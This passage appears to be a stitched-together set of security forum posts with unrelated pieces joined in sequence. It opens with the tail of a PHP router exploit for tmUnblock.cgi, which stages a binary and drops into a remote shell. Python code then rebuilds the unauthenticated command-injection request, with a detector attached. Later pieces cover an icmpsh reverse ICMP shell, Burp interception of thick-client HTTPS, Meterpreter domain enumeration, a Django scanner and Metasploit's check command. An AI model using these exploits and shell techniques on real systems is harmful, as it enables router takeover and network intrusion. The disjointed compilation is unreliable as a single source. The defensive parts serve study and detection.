build_payload($host, $port, $vuln, $shellcode);
sleep(3); // don't rush him

echo "Executing payload... ";
if(!send_packet($host, $port, build_packet($host, $port, $vuln, "/tmp/c0d3z"))) die("fail\n");
else echo "done!\n";
sleep(3); // don't rush him

echo "Attempting to get a shell... ";
$socket = fsockopen($host, 4444, $errno, $errstr, 30);
if(!$socket) die("fail\n");
else echo "connected!\n";

echo "Opening shell... \n";
while(!feof($socket)) {
    $cmd = readline($host."$ ");
    if(!empty($cmd)) readline_add_history($cmd);
    // there has got to be a better way to detect that we have
    // reached the end of the output than this, but whatever
    // it's late... i'm tired... and it works...
    fwrite($socket, $cmd.";echo xxxEOFxxx\n");
    $data = "";
    do {
        $data .= fread($socket, 1);
    } while(strpos($data, "xxxEOFxxx") === false && !feof($socket));
    echo str_replace("xxxEOFxxx", "", $data);
}
?>

http://www.exploit-db.com/exploits/31683/
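The two things that make the PHP exploit above work are the command injected through the ttcp_ip field of an unauthenticated POST and the binary written to /tmp in short octal "echo -en" chunks. The block below is an added example (not part of the exploit-db entry and not Rew's code) that re-creates both in Python, proves the staged chunks reassemble into the original bytes, and pairs them with a detector for the same request pattern. It never touches the network; the host, CGI name and sample payload are placeholders, and the payload is a constructed byte range rather than the MIPS ELF.

```python
"""
Added example, not part of the exploit-db entry above: re-creates the two ideas
that make the PHP exploit work (the command injected through the ttcp_ip field
of an unauthenticated POST, and the binary written to /tmp in short
'echo -en' octal chunks) and pairs them with a detector for that traffic.
Nothing here touches the network; host, CGI name and payload are placeholders.
"""
import base64
import re
from urllib.parse import unquote_to_bytes

# CGI scripts named in the exploit as reachable without a valid login.
CGI_NAMES = (b"tmUnblock.cgi", b"hndUnblock.cgi")

# Constructed stand-in for the MIPS ELF blob (covers every byte value).
SAMPLE_PAYLOAD = bytes(range(256))


def full_urlencode(s: str) -> str:
    """Percent-encode every character except '&', as the PHP helper does,
    but with two hex digits so bytes below 0x10 encode correctly."""
    return "".join(c if c == "&" else "%%%02x" % ord(c) for c in s)


def build_request(host: str, cgi: str, command: str) -> bytes:
    """Raw HTTP POST carrying `command` inside backticks in ttcp_ip.
    The Basic credentials are sent but never checked by the CGI."""
    body = full_urlencode(
        "submit_button=&change_action=&submit_type=&action=&commit=0&"
        "ttcp_num=2&ttcp_size=2&ttcp_ip=-h `" + command + "`&StartEPI=1"
    )
    auth = base64.b64encode(b"admin:ThisCanBeAnything").decode()
    head = (
        f"POST /{cgi} HTTP/1.1\r\nHost: {host}\r\n"
        f"Authorization: Basic {auth}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    )
    return head.encode() + body.encode()


def stage_commands(payload: bytes, path: str = "/tmp/c0d3z", chunk: int = 20):
    """Split a binary into `chunk`-byte 'echo -en' appends: each injected
    string stays short because long ones crash the router's httpd."""
    cmds = []
    for i in range(0, len(payload), chunk):
        octal = "".join("\\0%o" % b for b in payload[i:i + chunk])
        cmds.append(f"echo -en '{octal}' >> {path}")
    return cmds


def echo_en_decode(cmd: str) -> bytes:
    """Interpret the \\0NNN escapes the way 'echo -en' does, to check the
    staged chunks reassemble into the original bytes."""
    quoted = cmd.split("'", 2)[1]
    return bytes(int(m, 8) for m in re.findall(r"\\0([0-7]{1,3})", quoted))


def is_tmunblock_injection(raw_request: bytes) -> bool:
    """Detection side: POST to one of the CGIs with shell backticks in
    ttcp_ip. Fields are decoded first because the body is fully encoded."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].split(b" ")
    if len(request_line) < 2 or request_line[0] != b"POST":
        return False
    path = request_line[1].lstrip(b"/").split(b"?", 1)[0]
    if path not in CGI_NAMES:
        return False
    for field in body.split(b"&"):
        name, _, value = unquote_to_bytes(field).partition(b"=")
        if name == b"ttcp_ip" and b"`" in value:
            return True
    return False


def demo(payload: bytes = SAMPLE_PAYLOAD):
    """Stage the payload, prove it round-trips, and show the detector fires."""
    cmds = stage_commands(payload)
    rebuilt = b"".join(echo_en_decode(c) for c in cmds)
    first = build_request("192.168.1.1", "tmUnblock.cgi", cmds[0])
    return len(cmds), rebuilt == payload, is_tmunblock_injection(first)


if __name__ == "__main__":
    print(demo())
```

The detector keys on the request shape rather than on the worm's binary, so it also catches hand-driven use of the same CGI; a POST to tmUnblock.cgi with a plain address in ttcp_ip is left alone.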
-
Django Static Code Analysis – with Joff Thyer DjangoSCA is a python based Django project source code security auditing system that makes use of the Django framework itself, the Python Abstract Syntax Tree (AST) library, and regular expressions. Django projects are laid out in a directory structure that conforms to a standard form using known classes, and standard file naming such as settings.py, urls.py, views.py, and forms.py. DjangoSCA is designed for the user to pass the root directory of the Django project as an argument to the program, from which it will recursively descend through the project files and perform source code checks on all python source code, and Django template files. Video: Watch Django Source Code Security Scanner - Joff Thyer | Security Weekly TV Episodes | Tech & Gadgets Videos | Blip Security Weekly Podcasts
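The description above says DjangoSCA combines Python AST walks over the project's .py files with regular expressions over template files. The block below is an added illustration of that shape, not DjangoSCA's own checks: it walks module-level assignments in a settings module for DEBUG = True, a wildcard ALLOWED_HOSTS and a literal SECRET_KEY, and applies regexes to a template for the safe filter and autoescape off. The settings and template snippets are constructed for the example.

```python
"""
Added illustration, not DjangoSCA's own checks: the shape of an AST-based
settings audit plus a regex-based template check, the two techniques the
description above says the tool combines. The settings and template sources
are constructed for this example.
"""
import ast
import re

# Constructed settings.py fragments: one weak, one fixed.
WEAK_SETTINGS = '''
DEBUG = True
ALLOWED_HOSTS = ["*"]
SECRET_KEY = "hardcoded-dev-key"
'''
FIXED_SETTINGS = '''
import os
DEBUG = False
ALLOWED_HOSTS = ["app.example.com"]
SECRET_KEY = os.environ["DJANGO_SECRET_KEY"]
'''

# Constructed template snippets.
WEAK_TEMPLATE = "<p>{{ comment|safe }}</p>{% autoescape off %}{{ bio }}{% endautoescape %}"
FIXED_TEMPLATE = "<p>{{ comment }}</p><p>{{ bio }}</p>"


def _literal(node):
    """Value of a literal AST node, or None when it is not a plain literal
    (e.g. os.environ[...] rather than a string)."""
    try:
        return ast.literal_eval(node)
    except (ValueError, TypeError, SyntaxError):
        return None


def audit_settings(src: str):
    """Walk module-level assignments and return (lineno, finding) pairs."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Assign):
            continue
        for target in node.targets:
            if not isinstance(target, ast.Name):
                continue
            value = _literal(node.value)
            if target.id == "DEBUG" and value is True:
                findings.append((node.lineno, "DEBUG is True"))
            elif target.id == "ALLOWED_HOSTS" and isinstance(value, list) and "*" in value:
                findings.append((node.lineno, "ALLOWED_HOSTS contains '*'"))
            elif target.id == "SECRET_KEY" and isinstance(value, str):
                findings.append((node.lineno, "SECRET_KEY is a string literal in source"))
    return findings


# Template checks are plain regexes over the template text, since Django
# templates are not Python and have no AST to walk.
TEMPLATE_PATTERNS = {
    "safe filter disables escaping": re.compile(r"\{\{[^}]*\|\s*safe\b"),
    "autoescape off block": re.compile(r"\{%\s*autoescape\s+off\s*%\}"),
}


def audit_template(src: str):
    """Names of the template patterns found in `src`."""
    return [name for name, rx in TEMPLATE_PATTERNS.items() if rx.search(src)]


if __name__ == "__main__":
    for lineno, msg in audit_settings(WEAK_SETTINGS):
        print(f"settings.py:{lineno}: {msg}")
    for msg in audit_template(WEAK_TEMPLATE):
        print(f"template: {msg}")
```

Using the AST rather than a regex for settings.py is what lets the SECRET_KEY check tell a quoted literal apart from os.environ[...] without false positives; a real scanner would recurse through the project directory and feed each file to the matching auditor.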
-
A little over a month ago, I published a Metasploit auxiliary module for brute-forcing Cisco ASDM logins that accompanied one of our TrustKeeper Scan Engine updates. Shortly afterwards, I received requests from a couple of people to share how I was able to get access to the inside of the ASDM transport layer, which is encrypted with SSL. Well, the short answer is that SSL isn't really that much of a hurdle if the thick client you're reversing doesn't verify the validity of the SSL certificates it's being presented with. The longer answer, and one I hope to answer during the course of this post, is that Burp makes "middling" non-proxy-aware HTTPS thick clients (like ASDM) a pretty simple and straightforward process, and I'll show you how.

Overview of the Process

The process for "reversing" the transport communications of these thick clients is as follows:

1. Obtain a thick client that uses HTTPS transport
2. Obtain a copy of Burp
3. Start Burp with admin privileges
4. Add a Proxy Listener w/ Redirection and Invisible Proxying
5. Connect to the proxy listener as if it was a server
6. Have fun...

Sounds pretty easy, right? Well, let's get started then.

Obtaining a Thick Client

The first step to getting inside a thick client's transport layer is choosing a thick client to play around with. A "thick client", for the purposes of this post, is really any client application that you would download and run to connect to a server application. I ended up using the Cisco ASDM client because I was focused on solving a specific problem, but the concepts and techniques can be repeated on most thick clients that don't do certificate validation. I encourage you to grab a copy of ASDM (if you've got an ASA) or pick a different thick client and follow along.

Obtaining a Copy of Burp

Go here and grab a free copy of Burp: Download Burp Suite. All the stuff we'll be talking about that uses Burp can be accomplished using the free version.
Starting Burp with Admin Privileges

So with a bit of caution and your fingers and toes crossed, you're going to need to start up Burp with admin privileges. This may make some of you feel a little uncomfortable, being that Burp is written in Java, but you're going to need to give Burp additional privileges in a later step in this post. If running Java with admin privileges is still tugging at your spidey senses, you are welcome to run without admin privileges and bind to a port in the ephemeral port range. The only shortfall of doing this is that your thick client application may or may not allow you to change the server port that it connects to. If it doesn't allow you to change the port, you will need admin privileges to proceed.

You can invoke Burp with admin privileges like this on Linux or Mac:

sudo java -jar burpsuite_pro_v1.5.20.jar

You can also add your own creative flair to the options supplied by this command and give Burp more memory, but that is outside of the scope of what we'll need to get the job done.

Adding a Proxy Listener w/ Redirection and Transport Proxying

Ok, now we're getting to the interesting stuff. This is going to require a little bit more explanation because it's not a scenario you would see often. In the default Proxy Listener configuration that most people who use Burp are familiar with, you are provided with a CONNECT proxy listener bound to the loopback adapter on port 8080. This allows us to explicitly tell our browser where the proxy listener is and how to communicate with it. The difference when using a thick client that is not proxy aware is the need for the ability to point the thick client to the proxy. We need to do this because this is what will allow the proxy to see all the requests sent to the server. We can do this by adding an additional proxy listener on the loopback adapter and configuring it to act as the legitimate server to which the thick client needs to connect.
Let's look at some screenshots on how to do this:

Step 1: Visit the Proxy => Options configuration tab

Note: This is the default listener that is provided in Burp.

Step 2: Click Add to add a proxy listener and add the bind port on the loopback

Note: You can use the server port (i.e. port 443 in the case of Cisco ASDM) if you invoked Burp with admin privileges; if not, choose something in the ephemeral range and then use that port later when you connect with the client.

Step 3: Set a Redirect Host and Port and Enable Invisible Proxying

Note: The redirect "binds" your locally mapped port to the remote service, forming an SSL proxy that Burp can inspect. The invisible proxying tells Burp that its interface should be an emulated web server interface rather than the typical proxy-style interface that's used by default.

Connect to the New Proxy Listener

Now that we have everything all set up and ready, we can take the Cisco ASDM client and connect to the newly created proxy listener as if it was the Cisco ASA device. So we fire up the Cisco ASDM client and point it at our proxy listener, like so:

Note: Make sure you have the proxy intercept feature disabled, or authentication will time out waiting for you to advance all the requests it needs to make to fully run.

As the ASDM client attempts to log in, you will see that the site map within Burp will begin to populate with all the various paths that are used by the ASDM client to gather information and configure the Cisco ASA. Here's an example of what my site map looks like once ASDM has fully loaded. This tells us a lot about how the ASDM client works, including its authentication process, which is in the very first request that is made to the firewall:

As you can see, the authentication is merely a POST request that can be easily replicated in a script to quickly automate the process of credential checking of Cisco ASA ASDM logins. This is what was actually captured in the Metasploit module I mentioned above.
We can also leverage many of these paths that we can now see to perform the ASDM administration tasks directly without needing to deal with the restrictions imposed by the thick client interface. This also makes us more aware of the server attack surface so we can perform a more thorough assessment of the application.

Conclusions

So there you have it. That's how easy it is to "reverse" the HTTPS transport layer of a thick client using some built-in features within Burp Suite. Not so bad, right? Well, I encourage you to find a thick client that you use in your daily work and use this process to see how it works under the hood. Maybe you can help automate some security checks for yourself or even use this process to help automate some administration tasks that were previously thought to be impossible. Either way, I'd be really happy to hear from anyone who reads this post and follows this process to see what his or her thick clients are doing inside the transport layer. See you next time!

Source
-
Background

Sometimes, network administrators make the penetration tester's life harder. Some of them do use firewalls for what they are meant to, surprisingly! Allowing traffic only onto known machines, ports and services (ingress filtering) and setting strong egress access control lists is one of these cases. In such scenarios, when you have owned a machine that is part of the internal network or the DMZ (e.g. in a Citrix breakout engagement or similar), it is not always trivial to get a reverse shell over TCP, not to mention a bind shell. However, what about UDP (commonly a DNS tunnel) or ICMP as the channel to get a reverse shell? ICMP is the focus of this tool.

Description

icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX-compatible master in C, Perl or Python. The main advantage over the other similar open source tools is that it does not require administrative privileges to run on the target machine. The tool is clean, easy and portable. The slave (client) runs on the target Windows machine; it is written in C and works on Windows only, whereas the master (server) can run on any platform on the attacker machine as it has been implemented in C and Perl by Nico Leidecker, and I have ported it to Python too, hence this GitHub fork.

Features

Open source software - primarily coded by Nico, forked by me.
Client/server architecture.
The master is portable across any platform that can run either C, Perl or Python code.
The target system has to be Windows because the slave runs on that platform only for now.
The user running the slave on the target system does not require administrative privileges.

Download: https://github.com/inquisb/icmpsh.git

Source
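The post above explains why ICMP gets through where TCP does not, but not what actually rides inside the packets. The block below is an added example, not icmpsh's own code: it builds and parses ICMP echo packets with an RFC 1071 checksum, puts the command in the master's echo reply and the command output in the slave's next echo request, and drives a short exchange through a fake shell. It uses no sockets, the session identifier is an assumed constant, and the command table is constructed; the real slave sends its echo requests through the Windows API, which is why it needs no raw-socket privileges.

```python
"""
Added example, not icmpsh's code: the wire-level mechanics a reverse ICMP
shell relies on. Commands and output travel in the data field of ICMP echo
packets; the slave polls with echo requests, the master answers each poll
with an echo reply carrying the next command. No sockets are used here.
"""
import struct

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0
SESSION_ID = 0xBEEF  # assumed: identifier used to pair slave and master

# Constructed stand-in for the slave's command shell.
FAKE_SHELL = {b"whoami": b"corp\\jdoe\n", b"hostname": b"WS01\n"}


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (odd length padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """ICMP header (type, code, checksum, id, seq) followed by the payload."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_echo(packet: bytes):
    """Return (type, id, seq, payload), or None on a bad checksum or code."""
    if packet is None or len(packet) < 8 or icmp_checksum(packet) != 0:
        return None
    icmp_type, code, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    if code != 0:
        return None
    return icmp_type, ident, seq, packet[8:]


class Master:
    """Master side: queue commands, hand one out per poll, collect output."""

    def __init__(self, commands):
        self.pending = list(commands)
        self.output = b""

    def on_request(self, packet: bytes):
        parsed = parse_echo(packet)
        if parsed is None or parsed[0] != ICMP_ECHO_REQUEST or parsed[1] != SESSION_ID:
            return None
        _, ident, seq, data = parsed
        self.output += data  # output of the previous command
        cmd = self.pending.pop(0) if self.pending else b""
        return build_echo(ICMP_ECHO_REPLY, ident, seq, cmd)


def slave_poll(seq: int, previous_output: bytes) -> bytes:
    """Slave side: each poll carries the output of the last command."""
    return build_echo(ICMP_ECHO_REQUEST, SESSION_ID, seq, previous_output)


def slave_handle_reply(packet, run) -> bytes:
    """Run whatever command came back in the reply; empty data means idle."""
    parsed = parse_echo(packet)
    if parsed is None or parsed[0] != ICMP_ECHO_REPLY:
        return b""
    cmd = parsed[3]
    return run(cmd) if cmd else b""


def simulate(commands, run) -> bytes:
    """Drive enough polls to deliver every command; return collected output."""
    master = Master(commands)
    out = b""
    for seq in range(len(commands) + 1):
        reply = master.on_request(slave_poll(seq, out))
        out = slave_handle_reply(reply, run)
    return master.output


if __name__ == "__main__":
    print(simulate([b"whoami", b"hostname"], lambda c: FAKE_SHELL.get(c, b"")))
```

The one-poll lag is inherent to the design: the slave can only report output when it next asks for work, so the master sees a command's result on the poll after it was issued, and a quiet slave keeps polling with empty data so the channel stays open.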
-
Windows Meterpreter recently got some new capabilities through the Extended API module by OJ Reeves, also known as TheColonial. He added support for:

Interacting with the Clipboard
Query services
Window enumeration
Executing ADSI Queries

The one that interests me the most is the second one, for many reasons, among them: I can query Active Directory for information on:

Users
Groups
Policies
Hosts

I can query most of the information without the need of having Administrator privileges; just domain membership is enough for most, or being run as SYSTEM on a machine joined to the domain.

Let's start with the basics. When we get a Meterpreter session we need to check 2 things:

Is the machine and user I'm running under a member of the Domain?
Is the current session inside the network with access to a Domain Controller so it can query AD?

There are several methods you can do by hand for this, like checking the list of processes and running getuid to see if we see domain membership under the users, but I prefer to automate any small tasks like that, and for that Meterpreter scripts are wonderful since they do not have the added typing and complexity of a post module for a simple task. For this I wrote a simple script I called get_domain_name that can be found at .

meterpreter > run get_domain_name -h
Meterpreter Script for showing the domain name and prefered domain a host is a member of and the prefered DC.
Author: Carlos Perez

OPTIONS:

    -h  Help menu.

meterpreter >

NOTE: If you see anyone writing a Meterpreter script without a help block, slap him for me.

The script will do 2 things:

Check if the machine is part of a domain.
Identify the preferred domain controller and try to resolve its name to IP.

By trying to resolve the Domain Controller IP I can check if I'm in the domain or not.
Execution is simple with the run command:

meterpreter > run get_domain_name
[+] Domain: ACMELAB1
[+] Domain Controller: DC2.acmelab1.com
[+] IPv4: 10.10.10.3
[*] Could not resolve IPv6 for DC2.acmelab1.com

Here we can see the host is in a domain named ACMELAB1 and that we can resolve the IP address of the Domain Controller.

To query ADSI we need to first load the Extended API extension; for this, like with any other extension, we use the load command:

meterpreter > load extapi
Loading extension extapi...success.

If we use the help command or its alias ? we can see the commands that are now available inside the Meterpreter session:

Extapi: Service Management Commands
===================================

    Command        Description
    -------        -----------
    service_enum   Enumerate all registered Windows services
    service_query  Query more detail about a specific Windows service

Extapi: Clipboard Management Commands
=====================================

    Command             Description
    -------             -----------
    clipboard_get_data  Read the victim's current clipboard (text, files, images)
    clipboard_set_text  Write text to the victim's clipboard

Extapi: ADSI Management Commands
================================

    Command             Description
    -------             -----------
    adsi_computer_enum  Enumerate all computers on the specified domain.
    adsi_domain_query   Enumerate all objects on the specified domain that match a filter.
    adsi_user_enum      Enumerate all users on the specified domain.

Two of the ADSI commands simplify the process of enumeration; these are:

* adsi_computer_enum - does basic computer account enumeration.
* adsi_user_enum - does basic user enumeration.

If we look at the help options for one of the commands we will see they all have a page size and a maximum number of results to get; this is because AD can be very big and it can overwhelm Meterpreter.

meterpreter > adsi_computer_enum -h
Usage: adsi_computer_enum [-h] [-m maxresults] [-p pagesize]

Enumerate the computers on the target domain.
Enumeration returns information such as the computer name, desc, and comment.

OPTIONS:

    -h  Help banner
    -m  Maximum results to return.
    -p  Result set page size.

Let's enumerate computer accounts:

meterpreter > adsi_computer_enum acmelab1

acmelab1 Objects
================

    name       distinguishedname                                                         description  comment
    ----       -----------------                                                         -----------  -------
    CLIEN01    CN=CLIEN01,CN=Computers,DC=acmelab1,DC=com
    COLLECTOR  CN=COLLECTOR,OU=International Marketing,OU=Marketing,DC=acmelab1,DC=com
    DC1        CN=DC1,OU=Domain Controllers,DC=acmelab1,DC=com
    DC2        CN=DC2,OU=Domain Controllers,DC=acmelab1,DC=com
    DC3        CN=DC3,OU=Domain Controllers,DC=acmelab1,DC=com

Total objects: 5

In the domain field we can also provide an LDAP distinguished name to control the scope of the query:

meterpreter > adsi_computer_enum 'OU=Domain Controllers,DC=acmelab1,DC=com'

OU=Domain Controllers,DC=acmelab1,DC=com Objects
================================================

    name  distinguishedname                                description  comment
    ----  -----------------                                -----------  -------
    DC1   CN=DC1,OU=Domain Controllers,DC=acmelab1,DC=com
    DC2   CN=DC2,OU=Domain Controllers,DC=acmelab1,DC=com
    DC3   CN=DC3,OU=Domain Controllers,DC=acmelab1,DC=com

Total objects: 3

For user accounts it functions in the same manner:

meterpreter > adsi_user_enum acmelab1 -m 10 -p 10

acmelab1 Objects
================

    samaccountname  name           distinguishedname                                 description                                                               comment
    --------------  ----           -----------------                                 -----------                                                               -------
    Administrator   Administrator  CN=Administrator,CN=Users,DC=acmelab1,DC=com      Built-in account for administering the computer/domain
    CLIEN01$        CLIEN01        CN=CLIEN01,CN=Computers,DC=acmelab1,DC=com
    DC1$            DC1            CN=DC1,OU=Domain Controllers,DC=acmelab1,DC=com
    DC2$            DC2            CN=DC2,OU=Domain Controllers,DC=acmelab1,DC=com
    DC3$            DC3            CN=DC3,OU=Domain Controllers,DC=acmelab1,DC=com
    Guest           Guest          CN=Guest,CN=Users,DC=acmelab1,DC=com              Built-in account for guest access to the computer/domain
    cperez          carlos Perez   CN=carlos Perez,CN=Users,DC=acmelab1,DC=com
    helpdesk        IT Helpdesk    CN=IT Helpdesk,CN=Users,DC=acmelab1,DC=com
    krbtgt          krbtgt         CN=krbtgt,CN=Users,DC=acmelab1,DC=com             Key Distribution Center Service Account
    krbtgt_28732    krbtgt_28732   CN=krbtgt_28732,CN=Users,DC=acmelab1,DC=com       Key Distribution Center service account for read-only domain controller

Total objects: 10

Now the command that provides the greatest flexibility is the adsi_domain_query command, since this one lets you craft your own queries and specify what fields you want. For these we need to use the LDAP filtering syntax; one of the best resources I have found for this is the SelfADSI page. The command differs from the rest in that it lets you build your query and you can specify the fields. This can get tricky if you have no previous experience with LDAP and AD. You can check in MSDN, use the PowerShell [adsisearcher] accelerator or use ADSI Edit on a lab domain to figure out the fields.

Let's look for disabled accounts and get their name, distinguishedname and description:

meterpreter > adsi_domain_query acmelab1 (&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2)) name distinguishedname description

acmelab1 Objects
================

    name          distinguishedname                              description
    ----          -----------------                              -----------
    Guest         CN=Guest,CN=Users,DC=acmelab1,DC=com           Built-in account for guest access to the computer/domain
    User15        CN=User15,CN=Users,DC=acmelab1,DC=com
    User28        CN=User28,CN=Users,DC=acmelab1,DC=com
    User36        CN=User36,CN=Users,DC=acmelab1,DC=com
    krbtgt        CN=krbtgt,CN=Users,DC=acmelab1,DC=com          Key Distribution Center Service Account
    krbtgt_28732  CN=krbtgt_28732,CN=Users,DC=acmelab1,DC=com    Key Distribution Center service account for read-only domain controller

Total objects: 6

Let's find all OUs in the domain:

meterpreter > adsi_domain_query acmelab1 (objectclass=organizationalunit) name distinguishedname

acmelab1 Objects
================

    name                     distinguishedname
    ----                     -----------------
    Domain Controllers       OU=Domain Controllers,DC=acmelab1,DC=com
    ITS                      OU=ITS,DC=acmelab1,DC=com
    International Marketing  OU=International Marketing,OU=Marketing,DC=acmelab1,DC=com
    Local Marketing          OU=Local Marketing,OU=Marketing,DC=acmelab1,DC=com
    Marketing                OU=Marketing,DC=acmelab1,DC=com
    Sales                    OU=Sales,DC=acmelab1,DC=com

Total objects: 6

One tip when testing queries is to use the name and distinguishedname fields, since these are present in most objects you query for and are useful for a quick test.

Based on the module and work from Metasploit contributor Meatballs on the enum_ad_computers module, I wrote several post modules that I maintain in my own GitHub repo for enumerating AD information, so as not to have to remember the queries; they save the info to the DB and Loot depending on the module. They can be found at all modules start with enum_ad_.

Source
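The adsi_domain_query filters above, in particular the userAccountControl:1.2.840.113556.1.4.803:=2 clause that finds disabled accounts, are easier to get right if you can see what they actually evaluate. The block below is an added example, not part of the Meterpreter extapi code: a small parser and evaluator for the LDAP filter syntax covering &, |, !, equality, presence and the two bitwise matching rules, run against a constructed in-memory directory rather than a live DC. The userAccountControl values are standard AD bit flags; the object names are made up.

```python
"""
Added example, not part of the Meterpreter extapi code: a small evaluator for
the LDAP filter syntax adsi_domain_query takes, including the
1.2.840.113556.1.4.803 (bitwise AND) matching rule used above to find
disabled accounts. It runs against a constructed directory, not a live DC,
so a query can be checked before it is sent through a session.
"""
import re

# Constructed objects; attribute names are lower-cased, as LDAP matching is case-insensitive.
DIRECTORY = [
    {"name": "Administrator", "objectcategory": "person", "objectclass": ["top", "user"], "useraccountcontrol": 66048},
    {"name": "Guest", "objectcategory": "person", "objectclass": ["top", "user"], "useraccountcontrol": 514},
    {"name": "svc_backup", "objectcategory": "person", "objectclass": ["top", "user"], "useraccountcontrol": 66050},
    {"name": "DC1", "objectcategory": "computer", "objectclass": ["top", "computer"], "useraccountcontrol": 532480},
    {"name": "Sales", "objectclass": ["top", "organizationalunit"]},
]

ACCOUNTDISABLE = 0x2          # userAccountControl bit tested by the query above
DONT_EXPIRE_PASSWORD = 0x10000
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"
LDAP_MATCHING_RULE_BIT_OR = "1.2.840.113556.1.4.804"


def parse_filter(text: str):
    """Recursive-descent parse into tuples: ('&'|'|', [kids]), ('!', kid),
    ('=', attr, value), ('present', attr), ('bit', rule, attr, mask)."""
    pos = 0

    def node():
        nonlocal pos
        if text[pos] != "(":
            raise ValueError("expected '(' at offset %d" % pos)
        pos += 1
        if text[pos] in "&|":
            op = text[pos]
            pos += 1
            kids = []
            while text[pos] == "(":
                kids.append(node())
            pos += 1  # closing ')'
            return (op, kids)
        if text[pos] == "!":
            pos += 1
            kid = node()
            pos += 1
            return ("!", kid)
        end = text.index(")", pos)
        item, pos = text[pos:end], end + 1
        m = re.fullmatch(r"([^:=]+):([\d.]+):=(\d+)", item)
        if m:
            return ("bit", m.group(2), m.group(1).lower(), int(m.group(3)))
        attr, _, value = item.partition("=")
        return ("present", attr.lower()) if value == "*" else ("=", attr.lower(), value)

    result = node()
    if pos != len(text):
        raise ValueError("trailing data after filter")
    return result


def matches(node, obj) -> bool:
    """Evaluate a parsed filter against one object (a dict of attributes)."""
    kind = node[0]
    if kind in ("&", "|"):
        return (all if kind == "&" else any)(matches(k, obj) for k in node[1])
    if kind == "!":
        return not matches(node[1], obj)
    if kind == "present":
        return node[1] in obj
    if kind == "=":
        _, attr, value = node
        have = obj.get(attr)
        have = have if isinstance(have, list) else [have]
        return any(str(v).lower() == value.lower() for v in have if v is not None)
    _, rule, attr, mask = node  # extensible match on an integer attribute
    value = obj.get(attr)
    if not isinstance(value, int):
        return False
    if rule == LDAP_MATCHING_RULE_BIT_AND:
        return value & mask == mask
    if rule == LDAP_MATCHING_RULE_BIT_OR:
        return value & mask != 0
    raise ValueError("unsupported matching rule " + rule)


def query(filter_text: str, *fields: str, directory=DIRECTORY):
    """Mimic adsi_domain_query: filter, then project the requested fields."""
    tree = parse_filter(filter_text)
    return [tuple(obj.get(f.lower()) for f in fields) for obj in directory if matches(tree, obj)]


DISABLED = "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))"

if __name__ == "__main__":
    print(query(DISABLED, "name"))
```

The bitwise rule is the part people get wrong: .803 requires every bit in the mask to be set, .804 requires at least one, and a plain userAccountControl=2 would only match an account whose entire value is 2, which never happens for a real user.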
-
Pwn Faster with Metasploit's Multi-Host Check Command
Fi8sVrs posted a topic in Tutoriale in engleza
One of the most popular requests I've received from professional penetration testers is that they often need to be able to break into a network as fast as possible, and into as many hosts as possible during an engagement. While Metasploit Pro or even the community edition already gives you a significant advantage in speed and efficiency, there is still quite a large group of hardcore Framework users out there, so we do whatever we can to improve everybody's hacking experience. A new trick we'd like to introduce today is the modified "check" command, which allows you to quickly identify vulnerable, or likely exploitable, machines in a more accurate manner. However, you should also understand that Metasploit isn't a real vulnerability scanner even though it has checks. For your vulnerability scanning needs, we recommend using a real scanner like Nexpose (or whatever it is you prefer), and importing the results to Metasploit.

New Check Command Usage

Before these changes, users could only run the check command one host at a time, which made it less practical against a large network. You could write resource scripts to overcome this problem, but in reality not everybody is equipped with hands-on programming experience in Ruby and the Metasploit API. Well, this is no longer a challenge starting today. What you can do now is check a range of hosts with whatever exploit or auxiliary module you're using, and you can specify the number of threads needed to perform this task.
A very basic usage is demonstrated below:

msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.0.123
rhost => 192.168.0.123
msf exploit(ms08_067_netapi) > check

Or it can be as simple as the following, without the need to specify the RHOST or RHOSTS datastore option (auxiliary scanning modules use RHOSTS):

msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > check 192.168.0.100-192.168.0.120

The default thread count is 1, but this is configurable. How many threads you can create depends on your system, so we advise you to play around with it a little bit with a process monitor tool and decide for yourself. Here's an example of running a multi-threaded check to make the module scan faster:

msf exploit(ms08_067_netapi) > set THREADS 10
THREADS => 10
msf exploit(ms08_067_netapi) > check 192.168.1.1/24

Please note that all checks are now also less verbose than before by default, but if you prefer to be better informed about what's happening, you can always set the VERBOSE datastore option to true.

New CheckCode Definitions

While adding this new feature to Metasploit, we also spent quite a lot of time redefining check codes and tweaking hundreds of existing modules and other files in an effort to allow users to better understand what the check is telling them, and use the module with more confidence. Please take your time to read the new guidelines before you decide to exploit anything:

Exploit::CheckCode::Unknown - The module fails to retrieve enough information from the target machine, such as due to a timeout or some kind of connection issue.

Exploit::CheckCode::Safe - The check fails to trigger the vulnerability, or even detect the service.

Exploit::CheckCode::Detected - The target is running the service in question, but the check fails to determine whether the target is vulnerable or not.

Exploit::CheckCode::Appears - This is used if the vulnerability is determined based on passive reconnaissance. For example: version, banner grabbing, or simply having the resource that's known to be vulnerable. There is no solid proof whether the target machine is actually exploitable or not.

Exploit::CheckCode::Vulnerable - The check is able to actually take advantage of the bug, and obtain some sort of hard evidence. For example: for a command execution type bug, it's able to execute a command and obtain an expected output. For a directory traversal, read a file from the target, etc. This level of check is pretty aggressive in nature, but normally shouldn't be DoSing the host as a way to prove the vulnerability.

Exploit::CheckCode::Unsupported - The module does not support the check method.

Module Developers

If you're interested in Metasploit module development, please also read our guidelines on how to write a check() method here.

